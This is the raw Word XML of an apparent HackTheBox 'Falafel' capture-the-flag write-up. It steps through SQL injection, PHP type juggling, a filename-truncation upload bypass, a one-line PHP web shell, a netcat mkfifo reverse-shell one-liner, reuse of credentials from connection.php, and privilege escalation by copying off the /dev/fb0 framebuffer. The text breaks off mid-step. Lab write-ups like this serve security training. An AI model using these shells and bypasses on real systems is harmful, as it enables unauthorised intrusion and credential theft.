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BDA64" w14:textId="1637AE6A" w:rsidR="00126040" w:rsidRDefault="00A65E06">
      <w:r>
        <w:t>HTB – Falafel write up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0EA55" w14:textId="02962171" w:rsidR="00A65E06" w:rsidRDefault="00A65E06">
      <w:r>
        <w:t>It is a hard Linux box that needs lot of techniques to get the shell and escalate the privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548DA6DE" w14:textId="5947830B" w:rsidR="00A65E06" w:rsidRDefault="00A65E06"/>
    <w:p w14:paraId="277B1929" w14:textId="4B6ABCE0" w:rsidR="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Initiate Nmap full port scan – we only find Port 80 and 443 are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCAB13" w14:textId="46D928FD" w:rsidR="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Perform directory brute-forcing with ffuf and include .txt, .php that reveals text files containing the usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14064742" w14:textId="42F128DC" w:rsidR="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On the web browser navigate to port 80, you will be redirected to Login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B95C3C" w14:textId="57233776" w:rsidR="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Here we need to do the SQL injection manually, but it’s too time consuming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798CFD71" w14:textId="0C75755F" w:rsidR="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>So, refer to IPPSEC video for simple python script that does the job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68803D" w14:textId="665FECD9" w:rsidR="00A65E06" w:rsidRPr="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can find the admin password can be found as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>0e462096931906507119562988736854</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E3DE4" w14:textId="22640FF9" w:rsidR="00A65E06" w:rsidRPr="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65E06">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>After a simple google search, we can find php is vulnerable to type juggling, which means passwords starts with 0e.. are considered as 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can use any of the password that are hashed to MD5 which starts with 0e. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C58338" w14:textId="1C991C99" w:rsidR="00A65E06" w:rsidRPr="00A65E06" w:rsidRDefault="00A65E06" w:rsidP="00A65E0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pacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">I have used one of the passwords from a famous github repository </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38EACEB5" w14:textId="21E8DDCF" w:rsidR="00A65E06" w:rsidRPr="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00A65E0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pacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">On successful login we can see a message </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9221E4" w14:textId="060B9DBE" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F2E3A6E" wp14:editId="5D078F26">
            <wp:extent cx="3486150" cy="21684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746" cy="217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3BF2" w14:textId="1DC1F64E" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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Also, we can find a page immediately after the login, this page has a image upload feature via URL. Accepts only image format files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720A806" w14:textId="6A3AC498" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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Now we create a sample php shell file &lt;?php echo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system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$_GET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'cmd'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 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&gt;  and save it as test.php.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B94FC51" w14:textId="7CF58905" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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 uploading the file, the upload is not successful, now we navigate to profile page. It displays a message “Know your limits”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72968C5C" w14:textId="14EF3A12" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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 googling we find, maximum file length in Linux is 255 so we need to create file name with 255 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38937731" w14:textId="2F3E143D" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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We can use php script or pattern_create (meterpreter) to get a word with 255 chars, that ends with .php.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B46DE" w14:textId="1B0F47AA" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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When we upload this, it got uploaded to /uploads/[random]/filename.php.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D0BCA" w14:textId="6DCA5224" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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When we click view-source, the file is trimmed to 236 characters, which makes the file not executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE1330" w14:textId="4A18FC91" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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Now we shorten filename in such a way that it gets trimmed to 236 chars and ends with .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E1B45" w14:textId="72D566FE" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233B8">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: total length including .png should be 240 chars, so after trimming to 236 the file name ends with .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD187A" w14:textId="05180B44" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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Make a get / post request to the file by adding ?cmd=whoami, to check the shell execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674E32F" w14:textId="740A0E46" w:rsidR="00E233B8" w:rsidRDefault="00E233B8" w:rsidP="00E233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Once the shell execution is confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D27E6D" w14:textId="56E37BCC" w:rsidR="00194085" w:rsidRDefault="00194085" w:rsidP="00E233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revershell from pentestmonkey cheat sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F98E5" w14:textId="77777777" w:rsidR="00194085" w:rsidRPr="00194085" w:rsidRDefault="00194085" w:rsidP="001940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94085">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701118FF" w14:textId="64ECDC2D" w:rsidR="00194085" w:rsidRDefault="00194085" w:rsidP="0019408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Using netcat listener, we can obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC796C4" w14:textId="2D138946" w:rsidR="00194085" w:rsidRDefault="009E2D0F" w:rsidP="0019408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We need</w:t>
      </w:r>
      <w:r w:rsidR="00194085">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to upgrade shell to proper usable one, so refer to IPPSEC video, where python command and few more commands are added to upgrade it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use python3 -c if python -c is not working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C664C" w14:textId="160D2A42" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r w:rsidRPr="009E2D0F">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121AE5BE" w14:textId="061BC306" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72157C1E" w14:textId="020E123F" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>stty raw -echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DEAB70" w14:textId="2963DC81" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770F1228" w14:textId="056D1FA3" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD1CD0" w14:textId="61861693" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r w:rsidRPr="009E2D0F">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701CDE90" w14:textId="1E93405D" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1218E19E" w14:textId="5A786F68" w:rsidR="009E2D0F" w:rsidRPr="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F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E2D0F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In /var/www/html/ folder we can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">find file name “connection.php” it has database credentials of the user </w:t>
      </w:r>
      <w:r w:rsidRPr="009E2D0F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mosche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</w:p>
    <w:p w14:paraId="5956CCBC" w14:textId="0B127AB4" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F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E2D0F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Just SSH to the system using mosche password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9F280" w14:textId="63874F38" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F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F6F47A" w14:textId="7E4401A0" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0F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SSH </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007902AF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>mosche@10.10.10.73</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AD8FD4D" w14:textId="11FF65CB" w:rsidR="009E2D0F" w:rsidRDefault="009E2D0F" w:rsidP="009E2D0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F4AEFBE" w14:textId="6A8C608D" w:rsidR="00CB2B54" w:rsidRDefault="009E2D0F" w:rsidP="00CB2B5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B2B54">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2B54">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2B54">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to find the UID and </w:t>
      </w:r>
      <w:r w:rsidR="00CB2B54" w:rsidRPr="00CB2B54">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list the services / process where mosche is member</w:t>
      </w:r>
      <w:r w:rsidR="00CB2B54">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s and below results as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266102A0" w14:textId="72AE8233" w:rsidR="00CB2B54" w:rsidRDefault="00CB2B54" w:rsidP="00CB2B5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3F23CD7" w14:textId="77777777" w:rsidR="00CB2B54" w:rsidRDefault="00CB2B54" w:rsidP="00CB2B54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5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>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>moshe@falafel:~$ id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5C2B5" w14:textId="2B0469AF" w:rsidR="00CB2B54" w:rsidRDefault="00CB2B54" w:rsidP="00CB2B54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>uid=1001(moshe) gid=1001(</w:t>
      </w:r>
      <w:r w:rsidR="003629F7">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">moshe)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07717521" w14:textId="26A732C1" w:rsidR="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415C7160" w14:textId="0A11076A" w:rsidR="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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 can see he is member of 44(video) group, he has access to contents of the group. The output is stored as framebuffer /dev/fb0, we need to convert this to fb0.raw or fb.raw and using right resolution we can see the text in the image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A562D7F" w14:textId="671C3F9F" w:rsidR="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7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1C19279" w14:textId="114F33AE" w:rsidR="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7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1AEFC9BB" w14:textId="77777777" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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3629F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Then, run the following command to get the width of the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1AC201" w14:textId="77777777" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629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629F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>moshe@falafel:/dev$ cat /sys/class/graphics/fb0/virtual_size | cut -d, -f1</w:t>
      </w:r>
      <w:r w:rsidRPr="003629F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1176</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29918D9C" w14:textId="77777777" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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3629F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Run the following command to get the height of the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF26D37" w14:textId="77777777" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629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629F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>moshe@falafel:/dev$ cat /sys/class/graphics/fb0/virtual_size | cut -d, -f2</w:t>
      </w:r>
      <w:r w:rsidRPr="003629F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>885</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E5AA7" w14:textId="1CC135A0" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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</w:p>
    <w:p w14:paraId="53A0A67B" w14:textId="26E06861" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7744889B" w14:textId="39058E1B" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   //  cp /dev/fb0 /tmp/fb.raw   so now this fb.raw file is in target system , we need to transfer this to kali linux. Using scp command we can achieve this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252982B1" w14:textId="606DC8E7" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F7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FFB6238" w14:textId="372C2C5F" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r w:rsidRPr="003629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scp moshe@10.10.10.73:/tmp/fb.raw .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF04DD" w14:textId="395A6FA6" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D79F338" w14:textId="2A7482DD" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CD11C1" w14:textId="57390E4F" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We can use this website to upload and render the fb.raw file from kali linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E6D141" w14:textId="29E57798" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003629F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</w:p>
    <w:p w14:paraId="6329B94A" w14:textId="33BBFD99" w:rsidR="003629F7" w:rsidRPr="003629F7" w:rsidRDefault="003629F7" w:rsidP="003629F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629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="003629F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
